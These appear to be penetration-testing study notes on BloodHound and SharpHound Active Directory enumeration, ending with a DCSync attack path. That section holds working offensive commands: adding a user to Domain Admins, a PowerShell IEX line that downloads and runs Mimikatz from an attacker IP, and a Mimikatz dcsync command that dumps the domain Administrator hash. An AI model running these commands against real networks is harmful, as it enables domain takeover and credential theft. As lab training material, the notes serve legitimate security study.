Bloodhound

Overview

Bloodhound works the same way that ldapdomaindump but it also collects data using Kerberos tickets and SMB sessions.

Bloodhound allows for better visualization of attack paths, misconfigurations and potential privilege escalation paths.

Domain Enumeration

sudo neo4j console

sudo bloodhound
sudo bloodhound-python -d PNPT.local -u greg -p 'Password1' -ns 192.168.1.129 -c all

Upload the dumped files into the Bloodhound GUI

Custom user to machine session query

MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

Sharphound

If you don't have valid AD credentials and only an open shell you can run sharphound.exe to collect the data

This is very noisy so it should only be ran if you don't mind the noise

SharpHound.exe -c All

Methodology

Mark all pwned machines
Check Reachable High Value Targets
- Essentially checks if that one machine could compromise the entire domain
Check Inbound Control Rights
- What can account/gorups can control this object
Check Outbound Control Rights (First Degree Object Control)
- What objects can our compromised machine control

DCSync/GetChangesAll

If you have GetChanges and GetChangesAll privileges you can perform a dcsync attack. This attack abuses dcsync and the way it works with syncing domain controllers together to make sure that they both have the most up to date data. This means that we can extract all of the NTLM hashes by requesting a dcsync with the domain controller.

Add yourself to the Domain service accounts

 net group "Domain Admins" itmanager /add /domain

Amsi bypass then use mimikatz

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Mimikatz.ps1')

Grab domain admin hash

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:conda.local /user:Administrator"'

PreviousLdapdomaindump NextAttack Paths

Last updated 7 months ago